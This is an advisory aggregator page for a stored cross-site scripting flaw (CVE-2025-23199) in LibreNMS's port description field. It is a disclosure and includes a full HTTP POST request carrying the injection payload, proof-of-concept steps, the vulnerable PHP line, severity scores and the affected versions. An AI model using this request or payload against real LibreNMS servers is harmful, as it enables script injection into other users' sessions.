Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS0yN3ZmLTNnNGYtNmpwN84ABDb5
LibreNMS Ports Stored Cross-site Scripting vulnerability
StoredXSS-LibreNMS-Ports
Description:
Stored XSS on the parameter:
/ajax_form.php
-> param: descr
Request:
POST /ajax_form.php HTTP/1.1
Host: <your_host>
X-Requested-With: XMLHttpRequest
X-CSRF-TOKEN: <your_XSRF_token>
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: <your_cookie>
type=update-ifalias&descr=%22%3E%3Cimg+src+onerror%3D%22alert(1)%22%3E&ifName=lo&port_id=1&device_id=1
of Librenms version 24.10.1 (https://github.com/librenms/librenms) allows remote attackers to inject malicious scripts. When a user views or interacts with the page displaying the data, the malicious script executes immediately, leading to potential unauthorized actions or data exposure.
Proof of Concept:
- Add a new device through the LibreNMS interface.
- Edit the newly created device and select the "ports" section.
- In the "Description" field, enter the following payload:
"><img src onerror="alert(1)">
. - Save the changes.
- The XSS vulnerability is triggered when accessing the "ports" tab, and the payload is executed again when hovering over the modified value in the "Port" field.
Payload:
Executes:
The script execution vulnerability in the description field, as shown in the image, occurs at Line 63 of functions.inc.php
$overlib_content = '<div class=overlib><span class=overlib-text>' . $text . '</span><br />';
Impact:
Execution of Malicious Code
Permalink: https://github.com/advisories/GHSA-27vf-3g4f-6jp7JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS0yN3ZmLTNnNGYtNmpwN84ABDb5
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Moderate
Classification: General
Published: 1 day ago
Updated: about 1 hour ago
CVSS Score: 4.6
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N
EPSS Percentage: 0.00043
EPSS Percentile: 0.1136
Identifiers: GHSA-27vf-3g4f-6jp7, CVE-2025-23199
References:
- https://github.com/librenms/librenms/security/advisories/GHSA-27vf-3g4f-6jp7
- https://github.com/librenms/librenms/pull/16721
- https://github.com/librenms/librenms/commit/9d07d166b87634091dcf21c62b28f9b42a3118c4
- https://nvd.nist.gov/vuln/detail/CVE-2025-23199
- https://github.com/advisories/GHSA-27vf-3g4f-6jp7
Blast Radius: 1.4
Affected Packages
packagist:librenms/librenms
Dependent packages: 1Dependent repositories: 2
Downloads: 51,117 total
Affected Version Ranges: < 24.10.1
Fixed in: 24.11.0
All affected versions: 1.20.1, 1.22.1, 1.30.1, 1.31.1, 1.31.2, 1.31.3, 1.32.1, 1.33.1, 1.36.1, 1.42.1, 1.48.1, 1.50.1, 1.53.1, 1.58.1, 1.62.1, 1.62.2, 1.64.1, 1.65.1, 1.70.0, 1.70.1, 21.1.0, 21.2.0, 21.3.0, 21.4.0, 21.5.0, 21.5.1, 21.6.0, 21.7.0, 21.8.0, 21.9.0, 21.9.1, 21.10.0, 21.10.1, 21.10.2, 21.11.0, 21.12.0, 21.12.1, 22.1.0, 22.2.0, 22.2.1, 22.2.2, 22.3.0, 22.4.0, 22.4.1, 22.5.0, 22.6.0, 22.7.0, 22.8.0, 22.9.0, 22.10.0, 22.11.0, 22.12.0, 23.1.0, 23.1.1, 23.2.0, 23.4.0, 23.4.1, 23.5.0, 23.6.0, 23.7.0, 23.8.0, 23.8.1, 23.8.2, 23.9.0, 23.9.1, 23.10.0, 23.11.0, 24.1.0, 24.2.0, 24.3.0, 24.4.0, 24.4.1, 24.5.0, 24.6.0, 24.7.0, 24.8.0, 24.8.1, 24.9.0, 24.9.1, 24.10.0
All unaffected versions: 24.10.1, 24.11.0, 24.12.0